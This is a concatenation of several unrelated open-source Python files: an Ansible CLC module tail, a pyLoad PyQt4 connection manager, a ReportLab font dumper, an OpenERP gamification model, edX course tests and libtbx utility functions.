for alert_policy in alert_policies.get('items'):
if alert_policy.get('name') == alert_policy_name:
if not alert_policy_id:
alert_policy_id = alert_policy.get('id')
else:
return module.fail_json(
msg='multiple alert policies were found with policy name : %s' % alert_policy_name)
return alert_policy_id
@staticmethod
def _alert_policy_exists(server, alert_policy_id):
"""
Checks if the alert policy exists for the server
:param server: the clc server object
:param alert_policy_id: the alert policy
:return: True: if the given alert policy id associated to the server, False otherwise
"""
result = False
alert_policies = server.alertPolicies
if alert_policies:
for alert_policy in alert_policies:
if alert_policy.get('id') == alert_policy_id:
result = True
return result
@staticmethod
def _set_user_agent(clc):
if hasattr(clc, 'SetRequestsSession'):
agent_string = "ClcAnsibleModule/" + __version__
ses = requests.Session()
ses.headers.update({"Api-Client": agent_string})
ses.headers['User-Agent'] += " " + agent_string
clc.SetRequestsSession(ses)
def main():
"""
The main function. Instantiates the module and calls process_request.
:return: none
"""
argument_dict = ClcModifyServer._define_module_argument_spec()
module = AnsibleModule(supports_check_mode=True, **argument_dict)
clc_modify_server = ClcModifyServer(module)
clc_modify_server.process_request()
from ansible.module_utils.basic import * # pylint: disable=W0614
if __name__ == '__main__':
main()
| gpl-3.0 |
OndrejIT/pyload | module/gui/ConnectionManager.py | 41 | 11002 | # -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
@author: mkaay
"""
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from os.path import join
from uuid import uuid4 as uuid
class ConnectionManager(QWidget):
warningShown = False
def __init__(self):
QWidget.__init__(self)
if not self.warningShown:
QMessageBox.warning(self, 'Warning',
"We are sorry but the GUI is not stable yet. Please use the webinterface for much better experience. \n", QMessageBox.Ok)
ConnectionManager.warningShown = True
mainLayout = QHBoxLayout()
buttonLayout = QVBoxLayout()
self.setWindowTitle(_("pyLoad ConnectionManager"))
self.setWindowIcon(QIcon(join(pypath, "icons","logo.png")))
connList = QListWidget()
new = QPushButton(_("New"))
edit = QPushButton(_("Edit"))
remove = QPushButton(_("Remove"))
connect = QPushButton(_("Connect"))
#box = QFrame()
boxLayout = QVBoxLayout()
#box.setLayout(boxLayout)
boxLayout.addWidget(QLabel(_("Connect:")))
boxLayout.addWidget(connList)
line = QFrame()
#line.setFixedWidth(100)
line.setFrameShape(line.HLine)
line.setFrameShadow(line.Sunken)
line.setFixedHeight(10)
boxLayout.addWidget(line)
form = QFormLayout()
form.setMargin(5)
form.setSpacing(20)
form.setAlignment(Qt.AlignRight)
checkbox = QCheckBox()
form.addRow(_("Use internal Core:"), checkbox)
boxLayout.addLayout(form)
mainLayout.addLayout(boxLayout)
mainLayout.addLayout(buttonLayout)
buttonLayout.addWidget(new)
buttonLayout.addWidget(edit)
buttonLayout.addWidget(remove)
buttonLayout.addStretch()
buttonLayout.addWidget(connect)
self.setLayout(mainLayout)
self.internal = checkbox
self.new = new
self.connectb = connect
self.remove = remove
self.editb = edit
self.connList = connList
self.edit = self.EditWindow()
self.connectSignals()
self.defaultStates = {}
def connectSignals(self):
self.connect(self, SIGNAL("setConnections"), self.setConnections)
self.connect(self.new, SIGNAL("clicked()"), self.slotNew)
self.connect(self.editb, SIGNAL("clicked()"), self.slotEdit)
self.connect(self.remove, SIGNAL("clicked()"), self.slotRemove)
self.connect(self.connectb, SIGNAL("clicked()"), self.slotConnect)
self.connect(self.edit, SIGNAL("save"), self.slotSave)
self.connect(self.connList, SIGNAL("itemDoubleClicked(QListWidgetItem *)"), self.slotItemDoubleClicked)
self.connect(self.internal, SIGNAL("clicked()"), self.slotInternal)
def setConnections(self, connections):
self.connList.clear()
for conn in connections:
item = QListWidgetItem()
item.setData(Qt.DisplayRole, QVariant(conn["name"]))
item.setData(Qt.UserRole, QVariant(conn))
self.connList.addItem(item)
if conn["default"]:
item.setData(Qt.DisplayRole, QVariant(_("%s (Default)") % conn["name"]))
self.connList.setCurrentItem(item)
def slotNew(self):
data = {"id":uuid().hex, "type":"remote", "default":False, "name":"", "host":"", "port":"7228", "user":"admin", "password":""}
self.edit.setData(data)
self.edit.show()
def slotEdit(self):
item = self.connList.currentItem()
data = item.data(Qt.UserRole).toPyObject()
data = self.cleanDict(data)
self.edit.setData(data)
self.edit.show()
def slotRemove(self):
item = self.connList.currentItem()
data = item.data(Qt.UserRole).toPyObject()
data = self.cleanDict(data)
self.emit(SIGNAL("removeConnection"), data)
def slotConnect(self):
if self.internal.checkState() == 2:
data = {"type": "internal"}
self.emit(SIGNAL("connect"), data)
else:
item = self.connList.currentItem()
data = item.data(Qt.UserRole).toPyObject()
data = self.cleanDict(data)
self.emit(SIGNAL("connect"), data)
def cleanDict(self, data):
tmp = {}
for k, d in data.items():
tmp[str(k)] = d
return tmp
def slotSave(self, data):
self.emit(SIGNAL("saveConnection"), data)
def slotItemDoubleClicked(self, defaultItem):
data = defaultItem.data(Qt.UserRole).toPyObject()
self.setDefault(data, True)
did = self.cleanDict(data)["id"]
#allItems = self.connList.findItems("*", Qt.MatchWildcard)
count = self.connList.count()
for i in range(count):
item = self.connList.item(i)
data = item.data(Qt.UserRole).toPyObject()
if self.cleanDict(data)["id"] == did:
continue
self.setDefault(data, False)
def slotInternal(self):
if self.internal.checkState() == 2:
self.connList.clearSelection()
def setDefault(self, data, state):
data = self.cleanDict(data)
self.edit.setData(data)
data = self.edit.getData()
data["default"] = state
self.edit.emit(SIGNAL("save"), data)
class EditWindow(QWidget):
def __init__(self):
QWidget.__init__(self)
self.setWindowTitle(_("pyLoad ConnectionManager"))
self.setWindowIcon(QIcon(join(pypath, "icons","logo.png")))
grid = QGridLayout()
nameLabel = QLabel(_("Name:"))
hostLabel = QLabel(_("Host:"))
localLabel = QLabel(_("Local:"))
userLabel = QLabel(_("User:"))
pwLabel = QLabel(_("Password:"))
portLabel = QLabel(_("Port:"))
name = QLineEdit()
host = QLineEdit()
local = QCheckBox()
user = QLineEdit()
password = QLineEdit()
password.setEchoMode(QLineEdit.Password)
port = QSpinBox()
port.setRange(1,10000)
save = QPushButton(_("Save"))
cancel = QPushButton(_("Cancel"))
grid.addWidget(nameLabel, 0, 0)
grid.addWidget(name, 0, 1)
grid.addWidget(localLabel, 1, 0)
grid.addWidget(local, 1, 1)
grid.addWidget(hostLabel, 2, 0)
grid.addWidget(host, 2, 1)
grid.addWidget(portLabel, 3, 0)
grid.addWidget(port, 3, 1)
grid.addWidget(userLabel, 4, 0)
grid.addWidget(user, 4, 1)
grid.addWidget(pwLabel, 5, 0)
grid.addWidget(password, 5, 1)
grid.addWidget(cancel, 6, 0)
grid.addWidget(save, 6, 1)
self.setLayout(grid)
self.controls = {"name": name,
"host": host,
"local": local,
"user": user,
"password": password,
"port": port,
"save": save,
"cancel": cancel}
self.connect(cancel, SIGNAL("clicked()"), self.hide)
self.connect(save, SIGNAL("clicked()"), self.slotDone)
self.connect(local, SIGNAL("stateChanged(int)"), self.slotLocalChanged)
self.id = None
self.default = None
def setData(self, data):
if not data: return
self.id = data["id"]
self.default = data["default"]
self.controls["name"].setText(data["name"])
if data["type"] == "local":
data["local"] = True
else:
data["local"] = False
self.controls["local"].setChecked(data["local"])
if not data["local"]:
self.controls["user"].setText(data["user"])
self.controls["password"].setText(data["password"])
self.controls["port"].setValue(int(data["port"]))
self.controls["host"].setText(data["host"])
self.controls["user"].setDisabled(False)
self.controls["password"].setDisabled(False)
self.controls["port"].setDisabled(False)
self.controls["host"].setDisabled(False)
else:
self.controls["user"].setText("")
self.controls["port"].setValue(1)
self.controls["host"].setText("")
self.controls["user"].setDisabled(True)
self.controls["password"].setDisabled(True)
self.controls["port"].setDisabled(True)
self.controls["host"].setDisabled(True)
def slotLocalChanged(self, val):
if val == 2:
self.controls["user"].setDisabled(True)
self.controls["password"].setDisabled(True)
self.controls["port"].setDisabled(True)
self.controls["host"].setDisabled(True)
elif val == 0:
self.controls["user"].setDisabled(False)
self.controls["password"].setDisabled(False)
self.controls["port"].setDisabled(False)
self.controls["host"].setDisabled(False)
def getData(self):
d = {}
d["id"] = self.id
d["default"] = self.default
d["name"] = self.controls["name"].text()
d["local"] = self.controls["local"].isChecked()
d["user"] = self.controls["user"].text()
d["password"] = self.controls["password"].text()
d["host"] = self.controls["host"].text()
d["port"] = self.controls["port"].value()
if d["local"]:
d["type"] = "local"
else:
d["type"] = "remote"
return d
def slotDone(self):
data = self.getData()
self.hide()
self.emit(SIGNAL("save"), data)
| gpl-3.0 |
nakagami/reportlab | src/tools/utils/dumpttf.py | 10 | 1887 | __all__=('dumpttf',)
def dumpttf(fn,fontName=None, verbose=0):
'''dump out known glyphs from a ttf file'''
import os
if not os.path.isfile(fn):
raise IOError('No such file "%s"' % fn)
from reportlab.pdfbase.pdfmetrics import registerFont, stringWidth
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.pdfgen.canvas import Canvas
if fontName is None:
fontName = os.path.splitext(os.path.basename(fn))[0]
dmpfn = '%s-ttf-dump.pdf' % fontName
ttf = TTFont(fontName, fn)
K = ttf.face.charToGlyph.keys()
registerFont(ttf)
c = Canvas(dmpfn)
W,H = c._pagesize
titleFontSize = 30 # title font size
titleFontName = 'Helvetica'
labelFontName = 'Courier'
fontSize = 10
border = 36
dx0 = stringWidth('12345: ', fontName, fontSize)
dx = dx0+20
dy = 20
K.sort()
y = 0
page = 0
for i, k in enumerate(K):
if y<border:
if page: c.showPage()
page += 1
y = H - border - titleFontSize
c.setFont(titleFontName, titleFontSize)
c.drawCentredString(W/2.0,y, 'TrueType Font %s Page %d' %(fontName,page))
y -= 0.2*titleFontSize + dy
x = border
c.setFont(labelFontName, 10)
c.drawString(x,y,'%5.5x:' % k )
c.setFont(fontName, 10)
c.drawString(x+dx0,y,unichr(k).encode('utf8'))
x += dx
if x+dx>W-border:
x = border
y -= dy
c.showPage()
c.save()
if verbose:
print 'Font %s("%s") has %d glyphs\ndumped to "%s"' % (fontName,fn,len(K),dmpfn)
if __name__=='__main__':
import sys, glob
if '--verbose' in sys.argv:
sys.argv.remove('--verbose')
verbose = 1
else:
verbose = 0
for a in sys.argv[1:]:
for fn in glob.glob(a):
dumpttf(fn, verbose=verbose)
| bsd-3-clause |
vrenaville/OCB | addons/gamification/models/res_users.py | 386 | 4010 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
from openerp.osv import osv
from challenge import MAX_VISIBILITY_RANKING
class res_users_gamification_group(osv.Model):
""" Update of res.users class
- if adding groups to an user, check gamification.challenge linked to
this group, and the user. This is done by overriding the write method.
"""
_name = 'res.users'
_inherit = ['res.users']
def get_serialised_gamification_summary(self, cr, uid, excluded_categories=None, context=None):
return self._serialised_goals_summary(cr, uid, user_id=uid, excluded_categories=excluded_categories, context=context)
def _serialised_goals_summary(self, cr, uid, user_id, excluded_categories=None, context=None):
"""Return a serialised list of goals assigned to the user, grouped by challenge
:excluded_categories: list of challenge categories to exclude in search
[
{
'id': <gamification.challenge id>,
'name': <gamification.challenge name>,
'visibility_mode': <visibility {ranking,personal}>,
'currency': <res.currency id>,
'lines': [(see gamification_challenge._get_serialized_challenge_lines() format)]
},
]
"""
all_goals_info = []
challenge_obj = self.pool.get('gamification.challenge')
domain = [('user_ids', 'in', uid), ('state', '=', 'inprogress')]
if excluded_categories and isinstance(excluded_categories, list):
domain.append(('category', 'not in', excluded_categories))
user = self.browse(cr, uid, uid, context=context)
challenge_ids = challenge_obj.search(cr, uid, domain, context=context)
for challenge in challenge_obj.browse(cr, uid, challenge_ids, context=context):
# serialize goals info to be able to use it in javascript
lines = challenge_obj._get_serialized_challenge_lines(cr, uid, challenge, user_id, restrict_top=MAX_VISIBILITY_RANKING, context=context)
if lines:
all_goals_info.append({
'id': challenge.id,
'name': challenge.name,
'visibility_mode': challenge.visibility_mode,
'currency': user.company_id.currency_id.id,
'lines': lines,
})
return all_goals_info
def get_challenge_suggestions(self, cr, uid, context=None):
"""Return the list of challenges suggested to the user"""
challenge_info = []
challenge_obj = self.pool.get('gamification.challenge')
challenge_ids = challenge_obj.search(cr, uid, [('invited_user_ids', 'in', uid), ('state', '=', 'inprogress')], context=context)
for challenge in challenge_obj.browse(cr, uid, challenge_ids, context=context):
values = {
'id': challenge.id,
'name': challenge.name,
'description': challenge.description,
}
challenge_info.append(values)
return challenge_info
| agpl-3.0 |
ampax/edx-platform-backup | lms/djangoapps/courseware/tests/test_courses.py | 12 | 9342 | # -*- coding: utf-8 -*-
"""
Tests for course access
"""
from django.conf import settings
from django.test.utils import override_settings
import mock
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from courseware.courses import (
get_course_by_id, get_cms_course_link, course_image_url,
get_course_info_section, get_course_about_section, get_cms_block_link
)
from courseware.tests.helpers import get_request_for_user
from student.tests.factories import UserFactory
import xmodule.modulestore.django as store_django
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.xml_importer import import_from_xml
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.django_utils import (
TEST_DATA_MOCK_MODULESTORE, TEST_DATA_MIXED_TOY_MODULESTORE
)
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.tests.xml import factories as xml
from xmodule.tests.xml import XModuleXmlImportTest
CMS_BASE_TEST = 'testcms'
TEST_DATA_DIR = settings.COMMON_TEST_DATA_ROOT
class CoursesTest(ModuleStoreTestCase):
"""Test methods related to fetching courses."""
@override_settings(
MODULESTORE=TEST_DATA_MOCK_MODULESTORE, CMS_BASE=CMS_BASE_TEST
)
def test_get_cms_course_block_link(self):
"""
Tests that get_cms_course_link_by_id and get_cms_block_link_by_id return the right thing
"""
self.course = CourseFactory.create(
org='org', number='num', display_name='name'
)
cms_url = u"//{}/course/org/num/name".format(CMS_BASE_TEST)
self.assertEqual(cms_url, get_cms_course_link(self.course))
cms_url = u"//{}/course/i4x://org/num/course/name".format(CMS_BASE_TEST)
self.assertEqual(cms_url, get_cms_block_link(self.course, 'course'))
class ModuleStoreBranchSettingTest(ModuleStoreTestCase):
"""Test methods related to the modulestore branch setting."""
@mock.patch(
'xmodule.modulestore.django.get_current_request_hostname',
mock.Mock(return_value='preview.localhost')
)
@override_settings(
HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS={r'preview\.': ModuleStoreEnum.Branch.draft_preferred},
MODULESTORE_BRANCH='fake_default_branch',
)
def test_default_modulestore_preview_mapping(self):
self.assertEqual(store_django._get_modulestore_branch_setting(), ModuleStoreEnum.Branch.draft_preferred)
@mock.patch(
'xmodule.modulestore.django.get_current_request_hostname',
mock.Mock(return_value='localhost')
)
@override_settings(
HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS={r'preview\.': ModuleStoreEnum.Branch.draft_preferred},
MODULESTORE_BRANCH='fake_default_branch',
)
def test_default_modulestore_branch_mapping(self):
self.assertEqual(store_django._get_modulestore_branch_setting(), 'fake_default_branch')
@override_settings(
MODULESTORE=TEST_DATA_MOCK_MODULESTORE, CMS_BASE=CMS_BASE_TEST
)
class MongoCourseImageTestCase(ModuleStoreTestCase):
"""Tests for course image URLs when using a mongo modulestore."""
def test_get_image_url(self):
"""Test image URL formatting."""
course = CourseFactory.create(org='edX', course='999')
self.assertEquals(course_image_url(course), '/c4x/edX/999/asset/{0}'.format(course.course_image))
def test_non_ascii_image_name(self):
# Verify that non-ascii image names are cleaned
course = CourseFactory.create(course_image=u'before_\N{SNOWMAN}_after.jpg')
self.assertEquals(
course_image_url(course),
'/c4x/{org}/{course}/asset/before___after.jpg'.format(
org=course.location.org,
course=course.location.course
)
)
def test_spaces_in_image_name(self):
# Verify that image names with spaces in them are cleaned
course = CourseFactory.create(course_image=u'before after.jpg')
self.assertEquals(
course_image_url(course),
'/c4x/{org}/{course}/asset/before_after.jpg'.format(
org=course.location.org,
course=course.location.course
)
)
def test_static_asset_path_course_image_default(self):
"""
Test that without course_image being set, but static_asset_path
being set that we get the right course_image url.
"""
course = CourseFactory.create(static_asset_path="foo")
self.assertEquals(
course_image_url(course),
'/static/foo/images/course_image.jpg'
)
def test_static_asset_path_course_image_set(self):
"""
Test that with course_image and static_asset_path both
being set, that we get the right course_image url.
"""
course = CourseFactory.create(course_image=u'things_stuff.jpg',
static_asset_path="foo")
self.assertEquals(
course_image_url(course),
'/static/foo/things_stuff.jpg'
)
class XmlCourseImageTestCase(XModuleXmlImportTest):
"""Tests for course image URLs when using an xml modulestore."""
def test_get_image_url(self):
"""Test image URL formatting."""
course = self.process_xml(xml.CourseFactory.build())
self.assertEquals(course_image_url(course), '/static/xml_test_course/images/course_image.jpg')
def test_non_ascii_image_name(self):
course = self.process_xml(xml.CourseFactory.build(course_image=u'before_\N{SNOWMAN}_after.jpg'))
self.assertEquals(course_image_url(course), u'/static/xml_test_course/before_\N{SNOWMAN}_after.jpg')
def test_spaces_in_image_name(self):
course = self.process_xml(xml.CourseFactory.build(course_image=u'before after.jpg'))
self.assertEquals(course_image_url(course), u'/static/xml_test_course/before after.jpg')
@override_settings(MODULESTORE=TEST_DATA_MOCK_MODULESTORE)
class CoursesRenderTest(ModuleStoreTestCase):
"""Test methods related to rendering courses content."""
# TODO: this test relies on the specific setup of the toy course.
# It should be rewritten to build the course it needs and then test that.
def setUp(self):
"""
Set up the course and user context
"""
super(CoursesRenderTest, self).setUp()
store = store_django.modulestore()
course_items = import_from_xml(store, self.user.id, TEST_DATA_DIR, ['toy'])
course_key = course_items[0].id
self.course = get_course_by_id(course_key)
self.request = get_request_for_user(UserFactory.create())
def test_get_course_info_section_render(self):
# Test render works okay
course_info = get_course_info_section(self.request, self.course, 'handouts')
self.assertEqual(course_info, u"<a href='/c4x/edX/toy/asset/handouts_sample_handout.txt'>Sample</a>")
# Test when render raises an exception
with mock.patch('courseware.courses.get_module') as mock_module_render:
mock_module_render.return_value = mock.MagicMock(
render=mock.Mock(side_effect=Exception('Render failed!'))
)
course_info = get_course_info_section(self.request, self.course, 'handouts')
self.assertIn("this module is temporarily unavailable", course_info)
@mock.patch('courseware.courses.get_request_for_thread')
def test_get_course_about_section_render(self, mock_get_request):
mock_get_request.return_value = self.request
# Test render works okay
course_about = get_course_about_section(self.course, 'short_description')
self.assertEqual(course_about, "A course about toys.")
# Test when render raises an exception
with mock.patch('courseware.courses.get_module') as mock_module_render:
mock_module_render.return_value = mock.MagicMock(
render=mock.Mock(side_effect=Exception('Render failed!'))
)
course_about = get_course_about_section(self.course, 'short_description')
self.assertIn("this module is temporarily unavailable", course_about)
@override_settings(MODULESTORE=TEST_DATA_MIXED_TOY_MODULESTORE)
class XmlCoursesRenderTest(ModuleStoreTestCase):
"""Test methods related to rendering courses content for an XML course."""
toy_course_key = SlashSeparatedCourseKey('edX', 'toy', '2012_Fall')
def test_get_course_info_section_render(self):
course = get_course_by_id(self.toy_course_key)
request = get_request_for_user(UserFactory.create())
# Test render works okay. Note the href is different in XML courses.
course_info = get_course_info_section(request, course, 'handouts')
self.assertEqual(course_info, "<a href='/static/toy/handouts/sample_handout.txt'>Sample</a>")
# Test when render raises an exception
with mock.patch('courseware.courses.get_module') as mock_module_render:
mock_module_render.return_value = mock.MagicMock(
render=mock.Mock(side_effect=Exception('Render failed!'))
)
course_info = get_course_info_section(request, course, 'handouts')
self.assertIn("this module is temporarily unavailable", course_info)
| agpl-3.0 |
hickerson/bbn | fable/fable_sources/libtbx/utils.py | 1 | 43577 | from __future__ import division
from libtbx.queuing_system_utils import sge_utils, pbs_utils
from libtbx.str_utils import show_string
try: import gzip
except ImportError: gzip = None
try: import bz2
except ImportError: bz2 = None
try:
import hashlib
hashlib_md5 = hashlib.md5
except ImportError:
import md5
hashlib_md5 = md5.new
from stdlib import math
import warnings
import shutil
import glob
import time
import atexit
import traceback
import re
import sys, os
op = os.path
windows_device_names = """\
CON PRN AUX NUL COM1 COM2 COM3 COM4 COM5 COM6 COM7 COM8 COM9
LPT1 LPT2 LPT3 LPT4 LPT5 LPT6 LPT7 LPT8 LPT9""".split()
def xfrange(start, stop=None, step=None, tolerance=None):
"""A float range generator."""
if stop is None:
stop = start + 0.0
start = 0.0
else:
start += 0.0 # force it to be a float
if step is None:
step = 1.0
else:
assert step != 0.0
count = int(math.ceil((stop - start) / step))
if ( tolerance is not None
and abs(start + count * step - stop) < abs(step * tolerance)):
count += 1
for i in xrange(count):
yield start + i * step
def frange(start, stop=None, step=None):
return list(xfrange(start, stop=stop, step=step))
def xsamples(start, stop=None, step=None, tolerance=1e-6):
return xfrange(start, stop, step, tolerance)
def samples(start, stop=None, step=None, tolerance=1e-6):
return list(xsamples(start, stop, step, tolerance))
def escape_sh_double_quoted(s):
"the result is supposed to be double-quoted when passed to sh"
if (s is None): return None
return s.replace('\\','\\\\').replace('"','\\"')
def xlen(seq):
if (seq is None): return seq
return len(seq)
def product(seq):
result = None
for val in seq:
if (result is None):
result = val
else:
result *= val
return result
def sequence_index_dict(seq, must_be_unique=True):
result = {}
for i,elem in enumerate(seq):
if (must_be_unique): assert elem not in result
result[elem] = i
return result
def number_from_string(string):
# similar to libtbx.phil.number_from_value_string
# (please review if making changes here)
if (string.lower() in ["true", "false"]):
raise ValueError(
'Error interpreting "%s" as a numeric expression.' % string)
try: return int(string)
except KeyboardInterrupt: raise
except Exception: pass
try: return eval(string, math.__dict__, {})
except KeyboardInterrupt: raise
except Exception:
raise ValueError(
'Error interpreting "%s" as a numeric expression: %s' % (
string, format_exception()))
def gzip_open(file_name, mode):
assert mode in ["r", "rb", "w", "wb", "a", "ab"]
if (gzip is None):
un = ""
if (mode[0] == "r"): un = "un"
raise RuntimeError(
"gzip module not available: cannot %scompress file %s"
% (un, show_string(file_name)))
return gzip.open(file_name, mode)
def bz2_open(file_name, mode):
assert mode in ('r', 'w')
if bz2 is None:
raise RuntimeError('bz2 module not available: cannot %compress file %s'
% ({'r':'un', 'w':''}[mode], file_name))
return bz2.BZ2File(file_name, mode)
def warn_if_unexpected_md5_hexdigest(
path,
expected_md5_hexdigests,
hints=[],
out=None):
m = hashlib_md5()
m.update("\n".join(open(path).read().splitlines()))
current_md5_hexdigest = m.hexdigest()
if (m.hexdigest() in expected_md5_hexdigests): return False
warning = "Warning: unexpected md5 hexdigest:"
file_name = " File: %s" % show_string(path)
new_hexdigest = " New md5 hexdigest: %s" % m.hexdigest()
width = max([len(s) for s in [warning, file_name, new_hexdigest]])
if (out is None): out = sys.stdout
print >> out, "*"*width
print >> out, warning
print >> out, file_name
print >> out, new_hexdigest
for hint in hints:
print >> out, hint
print >> out, "*"*width
return True
def get_memory_from_string(mem_str):
if type(mem_str)==type(1): return mem_str
if type(mem_str)==type(1.): return mem_str
mem_str = mem_str.replace(" ","").strip().upper()
if mem_str == "": return 0
factor=1024
for i, greek in enumerate(["K","M","G","T","E","Z","Y"]):
num_str=None
if mem_str[-1]==greek:
num_str = mem_str[:-1]
if mem_str.find("%sB" % greek)==len(mem_str)-2:
num_str = mem_str[:-2]
if num_str is not None:
try:
num = float(num_str)
except ValueError, e:
raise RuntimeError("""
The numerical portion of %s is not a valid float
""" % mem_str)
break
factor*=1024
else:
try:
num = int(mem_str)
except ValueError, e:
raise RuntimeError("""
There is no memory unit or valid float in %s
""" % mem_str)
factor=1
return num*factor
def getenv_bool(variable_name, default=False):
value = os.environ.get(variable_name, None)
if (value is None): return default
value_lower = value.lower()
if (value_lower not in ["false", "true", "0", "1"]):
raise Sorry(
'Environment variable %s must be "True", "False", "0", or "1"'
' (current value: "%s").' % (variable_name, value))
return (value_lower in ["true", "1"])
def file_size(file_name):
return os.stat(file_name).st_size
def copy_file(source, target, compress=None):
assert op.isfile(source)
if (op.isdir(target)):
target = op.join(target, op.basename(source))
if (compress is None):
t = open(target, "wb")
else:
assert compress == ".gz"
t = gzip_open(file_name=target+compress, mode="wb")
t.write(open(source, "rb").read())
del t
def remove_files(pattern=None, paths=None, ensure_success=True):
assert [pattern, paths].count(None) == 1
if (paths is None):
paths = glob.glob(pattern)
for path in paths:
if (ensure_success):
if (op.exists(path)):
os.remove(path)
if (op.exists(path)):
raise RuntimeError("Cannot remove file: %s" % show_string(path))
else:
if (op.isfile(path)):
os.remove(path)
def find_files (dir_name, pattern="*", files_only=True) :
assert os.path.isdir(dir_name) and (pattern is not None)
regex = re.compile(pattern)
files = os.listdir(dir_name)
matching_files = []
for file_name in files :
full_path = os.path.join(dir_name, file_name)
if (files_only) and (not os.path.isfile(full_path)) :
continue
if (regex.search(file_name) is not None) :
matching_files.append(full_path)
return matching_files
def sort_files_by_mtime (file_names=None, dir_name=None, reverse=False) :
assert ([file_names, dir_name].count(None) == 1)
if (dir_name is not None) :
assert os.path.isdir(dir_name)
file_names = [ os.path.join(dir_name, fn) for fn in os.listdir(dir_name) ]
files_and_mtimes = []
for file_name in file_names :
files_and_mtimes.append((file_name, os.path.getmtime(file_name)))
files_and_mtimes.sort(lambda x,y: cmp(x[1], y[1]))
if (reverse) :
files_and_mtimes.reverse()
return [ file_name for file_name, mtime in files_and_mtimes ]
def tupleize(x):
try:
return tuple(x)
except KeyboardInterrupt: raise
except Exception:
return (x,)
def plural_s(n, suffix="s"):
if (n == 1): return n, ""
return n, suffix
def n_dim_index_from_one_dim(i1d, sizes):
assert len(sizes) > 0
result = []
for sz in reversed(sizes):
assert sz > 0
result.append(i1d % sz)
i1d //= sz
result.reverse()
return result
def flat_list(nested_list):
result = []
if (hasattr(nested_list, "__len__")):
for sub_list in nested_list:
result.extend(flat_list(sub_list))
else:
result.append(nested_list)
return result
def select_matching(key, choices, default=None):
for key_pattern, value in choices:
m = re.search(key_pattern, key)
if m is not None: return value
return default
class Keep: pass
class Sorry(Exception):
"""
Basic exception type for user errors; the traceback will be suppressed.
"""
__orig_module__ = __module__
# trick to get just "Sorry" instead of "libtbx.utils.Sorry"
__module__ = Exception.__module__
def reset_module (self) :
self.__class__.__module__ = self.__class__.__orig_module__
disable_tracebacklimit = "LIBTBX_DISABLE_TRACEBACKLIMIT" in os.environ
__prev_excepthook = sys.excepthook
def sorry_excepthook(type, value, traceback):
tb_off = (not disable_tracebacklimit and isinstance(value, Sorry))
if (tb_off):
class __not_set(object): pass
prev_tracebacklimit = getattr(sys, "tracebacklimit", __not_set)
sys.tracebacklimit = 0
result = __prev_excepthook(type, value, traceback)
if (tb_off):
if (prev_tracebacklimit is __not_set):
del sys.tracebacklimit
else:
sys.tracebacklimit = prev_tracebacklimit
return result
sys.excepthook = sorry_excepthook
class Usage(Sorry):
"""
Subclass of Sorry, for printing out usage instructions upon program
invocation without arguments (or --help, etc.).
"""
__module__ = Exception.__module__
class Abort(Sorry) :
"""
Subclass of Sorry, primarily used in the Phenix GUI in response to user
input.
"""
__module__ = Exception.__module__
class Failure(Sorry) :
__module__ = Exception.__module__
def detect_multiprocessing_problem():
vers_info = sys.version_info[:2]
if (vers_info < (2,6)):
return "multiprocessing module not available:" \
" Python 2.6 or higher is required" \
" (version currently in use: %d.%d)" % vers_info
import libtbx.load_env
if (libtbx.env.has_module("omptbx")) :
import omptbx
if (omptbx.omp_version is not None) :
return "multiprocessing is not compatible with OpenMP"
sem_open_msg = "This platform lacks a functioning sem_open implementation"
pool = None
try:
try:
import multiprocessing
pool = multiprocessing.Pool(processes=2)
pool.map(func=abs, iterable=range(2), chunksize=1)
except ImportError, e:
if (not str(e).startswith(sem_open_msg)):
raise
return "multiprocessing import error: " + sem_open_msg
finally:
if (pool is not None):
pool.close()
pool.join()
return None
def if_none(value, default):
if (value is None): return default
return value
def format_exception():
ei = sys.exc_info()
type_ = ei[0].__name__
value = str(ei[1])
if (value != ""):
value = value.replace(" (<string>, line ", " (line ")
else:
file_name, line = traceback.extract_tb(sys.exc_info()[2], 1)[0][:2]
if (file_name is not None):
value = file_name+" "
if (line is not None):
value += "line %d" % line
return ("%s: %s" % (type_, value)).rstrip()
def show_exception_info_if_full_testing(prefix="EXCEPTION_INFO: "):
import libtbx.load_env
if ( not libtbx.env.full_testing
and not disable_tracebacklimit):
return
from libtbx import introspection
from cStringIO import StringIO
sio = StringIO()
introspection.show_stack(out=sio)
traceback.print_exc(file=sio)
msg = "\n".join([prefix+line for line in sio.getvalue().splitlines()]) + "\n"
del sio
done = []
for out in [sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__]:
def is_done():
for o in done:
if (o is out): return True
return False
if (is_done()): continue
out.write(msg)
flush = getattr(out, "flush", None)
if (flush is not None): flush()
done.append(out)
return msg
def base36_encode(integer, width=None):
digit_set = "0123456789abcdefghijklmnopqrstuvwxyz"
digits = []
while (integer != 0):
integer, i = divmod(integer, 36)
digits.append(digit_set[i])
if (width is not None):
while (len(digits) < width):
digits.append("0")
digits.reverse()
return "".join(digits)
def base36_timestamp(seconds_since_epoch=None, multiplier=1000, width=10):
s = seconds_since_epoch
if (s is None):
s = time.time()
return base36_encode(integer=int(s * multiplier + 0.5), width=width)
def date_and_time():
seconds_since_epoch = time.time()
localtime = time.localtime(seconds_since_epoch)
